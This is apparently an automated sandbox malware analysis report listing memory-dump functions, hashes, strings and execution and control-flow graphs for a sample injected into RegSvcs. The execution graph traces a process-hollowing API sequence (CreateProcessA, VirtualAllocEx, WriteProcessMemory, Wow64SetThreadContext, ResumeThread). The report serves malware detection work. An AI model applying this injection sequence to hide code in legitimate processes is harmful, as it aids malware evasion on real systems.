                                                                  • Instruction ID: 8e594a7eab151b52a3446de99748328de2428a7f017775ed50916df994a6d803
                                                                  • Opcode Fuzzy Hash: 5342170ea9e2aa259bd4b8ef8eea89b2acbb8d3241fcf6ed314ebf0822712293
                                                                  • Instruction Fuzzy Hash: F790023520240402D510755C5C08647008A97D0301F55D511A4424A58EC65489A1A221
                                                                  Function 016D3D10 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f02340d9bc93501fa9435021984d4b6307dfa971bf95222abb457039ee034ced
                                                                  • Instruction ID: 1476b6714a0eeca650cedcde0bb6f56927ce0772fce1697301096b440ee04ca9
                                                                  • Opcode Fuzzy Hash: f02340d9bc93501fa9435021984d4b6307dfa971bf95222abb457039ee034ced
                                                                  • Instruction Fuzzy Hash: D1900231203401429540765C5C08A4F414997E1302B95D515A4015A54DC91489615321
                                                                  Function 016D2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                  • Instruction ID: 6f6ad15721a741acbce91f24dcc87f3e22b429fe3d4e0ed3ea8c24ce9bbeb85f
                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                  • Instruction Fuzzy Hash:
                                                                  Function 016D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: ac817041f64bb976dce5b8531afb7a4e8226deadb2cedf5eb9e7ac562ad14299
                                                                  • Instruction ID: 90acc863a166885aa9b7aab1e1fd5793e7d51a71814bb781c1cad1934677c31c
                                                                  • Opcode Fuzzy Hash: ac817041f64bb976dce5b8531afb7a4e8226deadb2cedf5eb9e7ac562ad14299
                                                                  • Instruction Fuzzy Hash: 9D51D4A6E04216AECB21DB9DCCA097EFBF8BB48240B10826DE565D7641D374DE5487E0
                                                                  Function 01742410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: ecd555176242f96421d4d6c2f50233fb40f5b72c8e58ee84807cbbfd9d891527
                                                                  • Instruction ID: 186bf3990e90f4a60354489d518564dffced88ba61adb237198e16ac71c5c52d
                                                                  • Opcode Fuzzy Hash: ecd555176242f96421d4d6c2f50233fb40f5b72c8e58ee84807cbbfd9d891527
                                                                  • Instruction Fuzzy Hash: E551E375A00646ABCB20DE9CDD9097FFBF9EF44200B148499F596C7642EBB4DA1087A0
                                                                  Function 016C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01704742
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01704787
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01704725
                                                                  • ExecuteOptions, xrefs: 017046A0
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017046FC
                                                                  • Execute=1, xrefs: 01704713
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01704655
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  • Opcode ID: 7f69fdd3a1874b7762595c71e60453e17a229bb68cfab1aaf22034ebbf1ebe19
                                                                  • Instruction ID: 248d913d81470bb8f0a787eb584cd23d466d2da2b7128adc9210b6d8c958827e
                                                                  • Opcode Fuzzy Hash: 7f69fdd3a1874b7762595c71e60453e17a229bb68cfab1aaf22034ebbf1ebe19
                                                                  • Instruction Fuzzy Hash: EB513B31A00229BAEF11EBA9DC89FFDB7A9EF15700F14009DD606A72C1E7719E458F54
                                                                  Function 01766940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                  • Instruction ID: c2e5fb7fb13e178a9785d3eb712061ed3b48ab11354a13088b58b1419f0703bc
                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                  • Instruction Fuzzy Hash: 9F021671508342AFD305CF18C894A6BFBE9EFC8704F548A6DF9898B264DB31E945CB42
                                                                  Function 016DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction ID: cc4ea423fd65e23e77bf6077ab55f635291a92768cd23f900ac6fa51d1a2158e
                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction Fuzzy Hash: D981D030E052999FEF258E6CCC917FEBBB2AF46360F1F4119D861A7399C73488418B55
                                                                  Function 017420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$[$]:%u
                                                                  • API String ID: 48624451-2819853543
                                                                  • Opcode ID: a9df07b1b70c3a5fc52b6c489b0ae6c34d83544da7864318025fed28726e2bab
                                                                  • Instruction ID: 66937214e8a55643d625125b498a92b0324a62bb047766a08bcdd614360b1981
                                                                  • Opcode Fuzzy Hash: a9df07b1b70c3a5fc52b6c489b0ae6c34d83544da7864318025fed28726e2bab
                                                                  • Instruction Fuzzy Hash: 7221517AE00119ABDB10EF69DC44ABEBBE9EF54650F14012AF905E3201EB30DA11CBA5
                                                                  Function 016BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017002E7
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017002BD
                                                                  • RTL: Re-Waiting, xrefs: 0170031E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  • API String ID: 0-2474120054
                                                                  • Opcode ID: 997e39560e214e0feb5667ff00b55ebea716846a6c53f84a3171789d6c29bb3e
                                                                  • Instruction ID: 0a702d95f2a747d67b1d1c3d2254a63b24a74c900a385798a130b2930f35e34b
                                                                  • Opcode Fuzzy Hash: 997e39560e214e0feb5667ff00b55ebea716846a6c53f84a3171789d6c29bb3e
                                                                  • Instruction Fuzzy Hash: B4E19D30608741DFD726CF28CC84B6ABBE1BB84364F144AADF5A58B2E1D774D985CB42
                                                                  Function 016CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01707B7F
                                                                  • RTL: Resource at %p, xrefs: 01707B8E
                                                                  • RTL: Re-Waiting, xrefs: 01707BAC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 0-871070163
                                                                  • Opcode ID: cff435f2427336ce3be008bf44fa192e9d5763a490c89394ce1d5f5191894780
                                                                  • Instruction ID: 7666088592a66616d80094d4dd895ba080295b3902d2079159c0fbc46def6a0f
                                                                  • Opcode Fuzzy Hash: cff435f2427336ce3be008bf44fa192e9d5763a490c89394ce1d5f5191894780
                                                                  • Instruction Fuzzy Hash: 7A41B0317047039BD725DE2DCC41B6AB7E5EB98B50F100A2DE9AA9B780DB71E8058B91
                                                                  Function 016CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0170728C
                                                                  Strings
                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01707294
                                                                  • RTL: Resource at %p, xrefs: 017072A3
                                                                  • RTL: Re-Waiting, xrefs: 017072C1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 885266447-605551621
                                                                  • Opcode ID: a2bce8fe6d697afbce8f41471176fcedfd67b8fafca3a2c4065b0f492ffea13a
                                                                  • Instruction ID: 6d769f06e83daddb6815f33e2f2c7c554389969d13913f60a77fbdf0f40fddf2
                                                                  • Opcode Fuzzy Hash: a2bce8fe6d697afbce8f41471176fcedfd67b8fafca3a2c4065b0f492ffea13a
                                                                  • Instruction Fuzzy Hash: 29411031609306ABC725CE29CC42B6AF7E5FB94B10F10461CF995AB280DB30F8168BD1
                                                                  Function 01742300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$]:%u
                                                                  • API String ID: 48624451-3050659472
                                                                  • Opcode ID: 7ff02e992a60070415e9a48d5cda44b9434f5c757566ea2d641aa31c148e5c9c
                                                                  • Instruction ID: 563014a51f3a1fa8674c028ce2732196d0218c9ec6c5880a46fc9e9ceaaa6d3b
                                                                  • Opcode Fuzzy Hash: 7ff02e992a60070415e9a48d5cda44b9434f5c757566ea2d641aa31c148e5c9c
                                                                  • Instruction Fuzzy Hash: 01318472A00219AFDB20DF2DDC44BEEB7F8EB44610F55455AF949E3201EB30EA548BA0
                                                                  Function 016D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-
                                                                  • API String ID: 1302938615-2137968064
                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction ID: 78534a15ea92d789a89ceeb2f6ce91ef977ecd850135ad0a39c53dfb988806c9
                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction Fuzzy Hash: A591BF71E0021A9AEB34CF6DCC81ABEBBA5EF84328F14455AE955E73C0D7309941CB62
                                                                  Function 01699126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $$@
                                                                  • API String ID: 0-1194432280
                                                                  • Opcode ID: e42d82ffea1c1c0c706c003e2fbc4ba577b2e813a86ef4e3aaae9bdf13d9a176
                                                                  • Instruction ID: fbc2fee0d8bcf334896e806c2d250082045b9d7df9ff3ae0ee7fc8b2ead92896
                                                                  • Opcode Fuzzy Hash: e42d82ffea1c1c0c706c003e2fbc4ba577b2e813a86ef4e3aaae9bdf13d9a176
                                                                  • Instruction Fuzzy Hash: 198119B1D002699BDB31CB54CC54BEEBBB8AB48714F1041EEEA19B7240D7309E85CFA4
                                                                  Function 0171CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0171CFBD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CallFilterFunc@8
                                                                  • String ID: @$@4Dw@4Dw
                                                                  • API String ID: 4062629308-3936743583
                                                                  • Opcode ID: b934065cbecc0df1f9bc85fe30211c85a268e450c5a6b3acd69cc328167aaf4c
                                                                  • Instruction ID: 65bf5fc28d07d8cbd078a36fabd16222c5431741c1ba0ea446de0e74b9c03935
                                                                  • Opcode Fuzzy Hash: b934065cbecc0df1f9bc85fe30211c85a268e450c5a6b3acd69cc328167aaf4c
                                                                  • Instruction Fuzzy Hash: CB418AB19402159FDB21AFADC844AAEFBB9FF54B10F10412EEA05DB258D730C801CBA5

                                                                  Execution Graph

                                                                  Execution Coverage:9%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:155
                                                                  Total number of Limit Nodes:8
                                                                  execution_graph 23233 1649cf0 23234 1649d12 23233->23234 23237 1649b6c 23234->23237 23236 1649d69 23238 1649b77 23237->23238 23241 1649b7c 23238->23241 23240 164a342 23240->23236 23242 1649b87 23241->23242 23245 1649b9c 23242->23245 23244 164a58d 23244->23240 23246 1649ba1 23245->23246 23249 1649bcc 23246->23249 23248 164a662 23248->23244 23250 1649bd7 23249->23250 23253 1649bfc 23250->23253 23252 164a774 23252->23248 23254 1649c07 23253->23254 23257 164d420 23254->23257 23256 164d598 23256->23252 23258 164d42b 23257->23258 23259 164f01a 23258->23259 23261 164f078 23258->23261 23259->23256 23262 164f0bb 23261->23262 23263 164f0c6 KiUserCallbackDispatcher 23262->23263 23264 164f0f0 23262->23264 23263->23264 23264->23259 23075 7facfb2 23076 7facf96 23075->23076 23077 7facfab 23076->23077 23080 7faf098 23076->23080 23096 7faf088 23076->23096 23081 7faf0b2 23080->23081 23094 7faf0d6 23081->23094 23112 57b02f9 23081->23112 23117 57b0106 23081->23117 23123 57b0647 23081->23123 23131 57b034c 23081->23131 23136 57b018c 23081->23136 23141 57b0168 23081->23141 23145 57b04cb 23081->23145 23153 57b0754 23081->23153 23157 57b0530 23081->23157 23161 57b0912 23081->23161 23165 57b029d 23081->23165 23170 57b019f 23081->23170 23178 57b0798 23081->23178 23094->23076 23097 7faf0b2 23096->23097 23098 57b02f9 2 API calls 23097->23098 23099 57b0798 4 API calls 23097->23099 23100 57b019f 4 API calls 23097->23100 23101 57b029d 2 API calls 23097->23101 23102 57b0912 2 API calls 23097->23102 23103 57b0530 2 API calls 23097->23103 23104 57b0754 2 API calls 23097->23104 23105 57b04cb 4 API calls 23097->23105 23106 57b0168 2 API calls 23097->23106 23107 57b018c 2 API calls 23097->23107 23108 57b034c 2 API calls 23097->23108 23109 57b0647 4 API calls 23097->23109 23110 7faf0d6 23097->23110 23111 57b0106 4 API calls 23097->23111 23098->23110 23099->23110 23100->23110 23101->23110 23102->23110 23103->23110 23104->23110 23105->23110 23106->23110 23107->23110 23108->23110 23109->23110 23110->23076 23111->23110 23113 57b0297 23112->23113 23114 57b0224 23112->23114 23185 7fac278 23113->23185 23189 7fac270 23113->23189 23114->23094 23114->23114 23193 7facb80 23117->23193 23197 7facb74 23117->23197 23125 57b01b6 23123->23125 23124 57b0662 23125->23123 23125->23124 23126 57b0174 23125->23126 23201 7fac8f8 23125->23201 23205 7fac8f1 23125->23205 23209 7fac328 23126->23209 23213 7fac320 23126->23213 23132 57b0352 23131->23132 23217 7fac9e8 23132->23217 23221 7fac9e0 23132->23221 23133 57b0375 23133->23094 23137 57b0199 23136->23137 23139 7fac278 ResumeThread 23137->23139 23140 7fac270 ResumeThread 23137->23140 23138 57b0224 23138->23138 23139->23138 23140->23138 23142 57b0174 23141->23142 23143 7fac328 Wow64SetThreadContext 23142->23143 23144 7fac320 Wow64SetThreadContext 23142->23144 23143->23142 23144->23142 23146 57b06f0 23145->23146 23225 7fac831 23146->23225 23229 7fac838 23146->23229 23147 57b08db 23147->23094 23148 57b0174 23148->23147 23149 7fac328 Wow64SetThreadContext 23148->23149 23150 7fac320 Wow64SetThreadContext 23148->23150 23149->23148 23150->23148 23155 7fac8f8 WriteProcessMemory 23153->23155 23156 7fac8f1 WriteProcessMemory 23153->23156 23154 57b0778 23155->23154 23156->23154 23158 57b0174 23157->23158 23158->23157 23159 7fac328 Wow64SetThreadContext 23158->23159 23160 7fac320 Wow64SetThreadContext 23158->23160 23159->23158 23160->23158 23163 7fac328 Wow64SetThreadContext 23161->23163 23164 7fac320 Wow64SetThreadContext 23161->23164 23162 57b092c 23163->23162 23164->23162 23166 57b02b5 23165->23166 23168 7fac278 ResumeThread 23166->23168 23169 7fac270 ResumeThread 23166->23169 23167 57b0224 23168->23167 23169->23167 23171 57b01a5 23170->23171 23172 57b0174 23171->23172 23173 57b0662 23171->23173 23174 7fac8f8 WriteProcessMemory 23171->23174 23175 7fac8f1 WriteProcessMemory 23171->23175 23176 7fac328 Wow64SetThreadContext 23172->23176 23177 7fac320 Wow64SetThreadContext 23172->23177 23174->23171 23175->23171 23176->23172 23177->23172 23181 7fac8f8 WriteProcessMemory 23178->23181 23182 7fac8f1 WriteProcessMemory 23178->23182 23179 57b09cf 23179->23094 23180 57b0174 23180->23179 23183 7fac328 Wow64SetThreadContext 23180->23183 23184 7fac320 Wow64SetThreadContext 23180->23184 23181->23180 23182->23180 23183->23180 23184->23180 23186 7fac2b8 ResumeThread 23185->23186 23188 7fac2e9 23186->23188 23188->23114 23190 7fac2b8 ResumeThread 23189->23190 23192 7fac2e9 23190->23192 23192->23114 23194 7facc09 CreateProcessA 23193->23194 23196 7facdcb 23194->23196 23196->23196 23198 7facc09 23197->23198 23198->23198 23199 7facd6e CreateProcessA 23198->23199 23200 7facdcb 23199->23200 23200->23200 23202 7fac940 WriteProcessMemory 23201->23202 23204 7fac997 23202->23204 23204->23125 23206 7fac940 WriteProcessMemory 23205->23206 23208 7fac997 23206->23208 23208->23125 23210 7fac36d Wow64SetThreadContext 23209->23210 23212 7fac3b5 23210->23212 23212->23126 23214 7fac36d Wow64SetThreadContext 23213->23214 23216 7fac3b5 23214->23216 23216->23126 23218 7faca33 ReadProcessMemory 23217->23218 23220 7faca77 23218->23220 23220->23133 23222 7faca33 ReadProcessMemory 23221->23222 23224 7faca77 23222->23224 23224->23133 23226 7fac878 VirtualAllocEx 23225->23226 23228 7fac8b5 23226->23228 23228->23148 23230 7fac878 VirtualAllocEx 23229->23230 23232 7fac8b5 23230->23232 23232->23148 23265 7fad1a3 23266 7facf9c 23265->23266 23267 7facfab 23266->23267 23268 7faf098 12 API calls 23266->23268 23269 7faf088 12 API calls 23266->23269 23268->23266 23269->23266 23270 57b0f10 23271 57b109b 23270->23271 23272 57b0f36 23270->23272 23272->23271 23275 57b1188 23272->23275 23278 57b1190 PostMessageW 23272->23278 23276 57b1190 PostMessageW 23275->23276 23277 57b11fc 23276->23277 23277->23272 23279 57b11fc 23278->23279 23279->23272

                                                                  Executed Functions

                                                                  Function 07FACB74 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 7facb74-7facc15 2 7facc4e-7facc6e 0->2 3 7facc17-7facc21 0->3 8 7facc70-7facc7a 2->8 9 7facca7-7faccd6 2->9 3->2 4 7facc23-7facc25 3->4 6 7facc48-7facc4b 4->6 7 7facc27-7facc31 4->7 6->2 10 7facc33 7->10 11 7facc35-7facc44 7->11 8->9 13 7facc7c-7facc7e 8->13 17 7faccd8-7facce2 9->17 18 7facd0f-7facdc9 CreateProcessA 9->18 10->11 11->11 12 7facc46 11->12 12->6 14 7facc80-7facc8a 13->14 15 7facca1-7facca4 13->15 19 7facc8e-7facc9d 14->19 20 7facc8c 14->20 15->9 17->18 21 7facce4-7facce6 17->21 31 7facdcb-7facdd1 18->31 32 7facdd2-7face58 18->32 19->19 22 7facc9f 19->22 20->19 23 7facce8-7faccf2 21->23 24 7facd09-7facd0c 21->24 22->15 26 7faccf6-7facd05 23->26 27 7faccf4 23->27 24->18 26->26 28 7facd07 26->28 27->26 28->24 31->32 42 7face5a-7face5e 32->42 43 7face68-7face6c 32->43 42->43 44 7face60 42->44 45 7face6e-7face72 43->45 46 7face7c-7face80 43->46 44->43 45->46 47 7face74 45->47 48 7face82-7face86 46->48 49 7face90-7face94 46->49 47->46 48->49 50 7face88 48->50 51 7facea6-7facead 49->51 52 7face96-7face9c 49->52 50->49 53 7faceaf-7facebe 51->53 54 7facec4 51->54 52->51 53->54 56 7facec5 54->56 56->56
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07FACDB6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: d1f80a427fae64dc80b7975b1f5681da05e3adc51510fe25f0f01e9815a4a77e
                                                                  • Instruction ID: 61e5912ae84bb9e9690fb083ccd50cf9439a2802ac18268d702c9e918e851b18
                                                                  • Opcode Fuzzy Hash: d1f80a427fae64dc80b7975b1f5681da05e3adc51510fe25f0f01e9815a4a77e
                                                                  • Instruction Fuzzy Hash: 7FA15DB1D0025ADFDB20CF68C884BEDBBF2BF48714F1481A9D859A7240DB759985CFA1
                                                                  Function 07FACB80 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 57 7facb80-7facc15 59 7facc4e-7facc6e 57->59 60 7facc17-7facc21 57->60 65 7facc70-7facc7a 59->65 66 7facca7-7faccd6 59->66 60->59 61 7facc23-7facc25 60->61 63 7facc48-7facc4b 61->63 64 7facc27-7facc31 61->64 63->59 67 7facc33 64->67 68 7facc35-7facc44 64->68 65->66 70 7facc7c-7facc7e 65->70 74 7faccd8-7facce2 66->74 75 7facd0f-7facdc9 CreateProcessA 66->75 67->68 68->68 69 7facc46 68->69 69->63 71 7facc80-7facc8a 70->71 72 7facca1-7facca4 70->72 76 7facc8e-7facc9d 71->76 77 7facc8c 71->77 72->66 74->75 78 7facce4-7facce6 74->78 88 7facdcb-7facdd1 75->88 89 7facdd2-7face58 75->89 76->76 79 7facc9f 76->79 77->76 80 7facce8-7faccf2 78->80 81 7facd09-7facd0c 78->81 79->72 83 7faccf6-7facd05 80->83 84 7faccf4 80->84 81->75 83->83 85 7facd07 83->85 84->83 85->81 88->89 99 7face5a-7face5e 89->99 100 7face68-7face6c 89->100 99->100 101 7face60 99->101 102 7face6e-7face72 100->102 103 7face7c-7face80 100->103 101->100 102->103 104 7face74 102->104 105 7face82-7face86 103->105 106 7face90-7face94 103->106 104->103 105->106 107 7face88 105->107 108 7facea6-7facead 106->108 109 7face96-7face9c 106->109 107->106 110 7faceaf-7facebe 108->110 111 7facec4 108->111 109->108 110->111 113 7facec5 111->113 113->113
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07FACDB6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 5902c89dfd07de9f1b5007f5558b12ca315868e6db6c3b1691cc42bcb4ba72bd
                                                                  • Instruction ID: 0c7347c6d77c183cf12f5018d3d2b4cf2a11e337f6f3395f9b11c336fd310a93
                                                                  • Opcode Fuzzy Hash: 5902c89dfd07de9f1b5007f5558b12ca315868e6db6c3b1691cc42bcb4ba72bd
                                                                  • Instruction Fuzzy Hash: EC914EB1D0025ADFDB20CF69C844BDDBBF2BF48714F148569D819A7240DB749985CFA1
